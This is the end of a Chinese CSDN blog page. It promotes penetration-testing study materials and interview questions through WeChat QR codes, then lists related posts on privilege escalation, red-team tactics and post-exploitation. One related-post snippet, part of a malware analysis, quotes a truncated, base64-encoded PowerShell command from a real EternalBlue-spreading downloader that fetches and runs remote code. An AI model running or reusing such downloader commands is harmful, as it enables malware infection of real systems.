还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取


<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704435025746.png?t=0.910351182018946" />


最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

![](https://img-blog.csdnimg.cn/img_convert/bcee6fb527bf6012c1c325d58c06bf26.png)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取


<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704435025746.png?t=0.910351182018946" />
网安攻城狮-小李
关注
  • 19
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
盘点蓝军(攻击方)惯用的本地提权攻击手段(网络安全
w56348的博客
09-12 668
在网络攻防演练实战权限提升技术在攻击者获取初始访问权限之后,扮演着关键的角色。攻击者利用权限提升技术,升级自身的权限,以突破初始的访问限制,并实现更深入、更具破坏性的攻击。因此,在演练,红军(防守方)需要有效应对蓝军(攻击方)试图提升权限的挑战。系统安全降级:攻击者通过权限提升手段将受害者的权限从普通用户提升为管理员,导致系统的安全性大幅降低。攻击者可以安装恶意软件、修改系统设置、删除重要文件,甚至完全控制受害者的计算机。恶意软件安装。
后渗透攻击:权限提升
岁月净好
11-22 561
渗透的最终目的是获取服务器的最高权限,即Windows操作系统管理员账号的权限,或Linux操作系统root账户的权限提升权限的方式分为以下两类。 纵向提权:低权限角色获得高权限角色的权限,例如,一个WebShell权限通过提权之后拥有了管理员的权限,那么这种提权就是纵向提权,也称做权限升级 横向提权:获取同级别角色的权限。例如:通过已经攻破的系统A获取了系统 B的权限,那么这种提权就属于横向提权。 所以在成功获取目标机Meterpreter Shell后,我们要知道现在已经拥有了什么权限。   
内网小总结
最新发布
2201_75378806的博客
05-11 905
本篇基于crto内容总结cs可以生成的listern有还有个pivot listener只能在现有的信标上创建,且负载类型是,而不是可以利用dnscan.py收集子域名,spoofy用于验证给定域的电子邮件安全密码喷射可以用mailsniper.ps1,利用namemash.py将获取一个人的全名并将其转换为可能的用户名排列密码喷射后登入邮件系统,现在要发送钓鱼邮件获取其它用户权限1.网络钓鱼宏注入2.远程模板注入3.html走私钓鱼成功上线后cs上线先进行主机观察:1.ps看进程。
Web安全攻防-----学习笔记(五)之后渗透攻击:权限提升
舞指如歌~的博客
09-14 907
5.6 后渗透攻击:权限提升 通常获取的权限为Guest或User权限,必须将访问权限从Guest提升到User,再到Administrator,最后到System级别。 提升权限的方式有两种: 纵向提权:低权限角色获得高权限角色的权限 横向提权:获取同级别角色的权限 输入shell进入目标机的cmd命令行,利用命令查看我们当前的权限: whoami /groups 说明当前是一个标...
还原永恒之蓝下载器PS脚本混淆
Sven的忘却日记
04-26 5693
注意:以下代码为真实永恒之蓝木马下载器恶意ps代码,请不要在真实机运行、测试以及调试!!! 下面代码取自了该病毒设置的计划任务 powershell.exe -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAG...
内网渗透测试第四章——权限提升攻防
山己见的博客
09-09 1010
系统内核溢出漏洞 此提权方法即是通过系统本身存在的一些漏洞,未曾打相应的补丁而暴露出来的提权方法,依托可以提升权限的EXP和它们的补丁编号,进行提升权限。 下面是几个方便查找相应补丁漏洞的辅助查询页面: 提权辅助脚本:https://github.com/ianxtianxt/win-exp- Windows平台提权漏洞集合:https://github.com/SecWiki/windows-kernel-exploits ### 手工查找补丁情况 systeminfo Wmic qfe get Cap
网络安全的教程.txt
04-10
网络安全渗透测试技术:学习如何模拟攻击者的行为,测试网络安全防护措施的有效性,包括信息收集、权限提升、数据泄露等测试方法。 三、网络安全实践 安全工具使用:熟悉并掌握常用的网络安全工具,如漏洞扫描器...
提升网络安全意识.docx
06-08
提升网络安全意识 信息管理学院 电子商务一班 王缤晨 2016103274 随着计算机网络技术的快速发展,网络安全日益成为人们关注的焦点。 计算机网络是一个开放和自由的空间,它在大大增强信息服务灵活性的同时,也带来...
Windows 权限提升 - 概述.pdf
10-06
网络安全渗透测试漏洞
毕设-Linux系统权限提升的原理分析与实现
03-11
Linux系统权限提升
02-核动力厂网络安全技术政策.pdf
08-29
核动力厂网络安全技术政策 核动力厂网络安全技术政策是...核动力厂网络安全技术政策的目的是指导营运单位通过建立和实施网络安全大纲,对核电厂网络安全风险进行监测和管理,以保证核电厂安全水平得以维持或得到提升
Seatbelt主机信息收集
01-04
打包好的主机信息收集exe工具,用于后渗透的信息收集。源码打包。
网络安全杀伤链:权限提升
华章IT官方博客
05-26 530
本文摘自《网络安全与攻防策略:现代威胁应用之道》4.4章节,网络安全杀伤链-权限提升。作者从威胁行为者的身份分析网络安全,便于读者朋友更好地理解执行攻击的原理、动机和步骤。我们称其为网络安...
Windows信息收集工具Seatbelt的使用
谢公子的博客
08-07 3310
Seatbelt Seatbelt是一个采用C#写的Windows下信息收集的工具。它从进攻性和防御性安全性角度执行许多面向安全性的主机调查“安全性检查”。
第四章——权限提升分析及防御
willow_liang的博客
12-24 2448
第4章权限提升分析及防御 在 Windows权限大概分为四种、分别是User、Administrator、System、TrustedInstaller。在这四种权限,我们经常接触的是前三种。第四种权限 TrustedInstaller,在常规使用通常不会涉及。 User:普通用户权限,是系统最安全的权限(因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料)。 Administrator:管理员权限。可以利用Windows 的机制将自己提升为Svstem权限,以便操作SAM文件等。
防溢出提升权限攻击解决办法(转)
congjukun0600的博客
08-12 213
防溢出提升权限攻击解决办法(转)[@more@]  在骇客频频攻击、在系统漏洞层出不穷的今天,作为网络管理员、系统管理员的我们虽然在服务器的安全上都下了不少功夫:诸如,及时的打上系统安全补丁、进行一些常规的安全配置,但是仍然不...
Web安全之权限攻击
brizer的博客
09-08 7049
权限攻击可以分为水平权限攻击和垂直权限攻击。水平权限攻击水平权限攻击,也叫作访问控制攻击。Web应用程序接收到用户请求,修改某条数据时,没有判断数据的所属人,或者在判断数据所属人时从用户提交的表单参数获取了userid。导致攻击者可以自行修改userid修改不属于自己的数据。所有的更新语句操作,都可能产生这个漏洞。攻击我们来看看攻击案例,Web应用在修改用户个人信息时,从用户提交的表单获取use
Metasploit(后渗透攻击:权限提升
qq_41453632的博客
12-03 5720
    通常,我们在渗透攻击时很有可能只获得了一个系统的Guest或User权限。低的权限级别将使我们受到很多的限制,在实施横向渗透或者提权攻击时将很困难。在主机上如果没有管理者权限,就无法进行获取Hash、安装软件、修改防火墙规则和修改注册表等各种操作,所以必须将访问权限从Guset提升到User,再到Administrator,最后到System级别。    渗透的最终目的是获取服务器的最高...
网络安全什么是逻辑漏洞
07-10
逻辑漏洞是指在软件或系统的设计、开发或实现存在的错误逻辑或不正确的假设,使得攻击者能够绕过预期的安全措施并执行未经授权的操作。逻辑漏洞不涉及具体的代码错误或技术缺陷,而是涉及对系统或应用程序逻辑的错误理解或错误实施。 逻辑漏洞可能导致严重的安全风险,因为攻击者可以利用这些漏洞来绕过访问控制、执行未经授权的操作、篡改数据或获取敏感信息。常见的逻辑漏洞包括身份验证绕过、权限提升、数据篡改、会话劫持和逻辑错误等。 为了防止逻辑漏洞,开发人员需要仔细审查和测试系统的设计和实现,确保逻辑正确性和安全性。此外,安全开发实践、安全编码准则和定期的安全审计也是预防和修复逻辑漏洞的重要步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值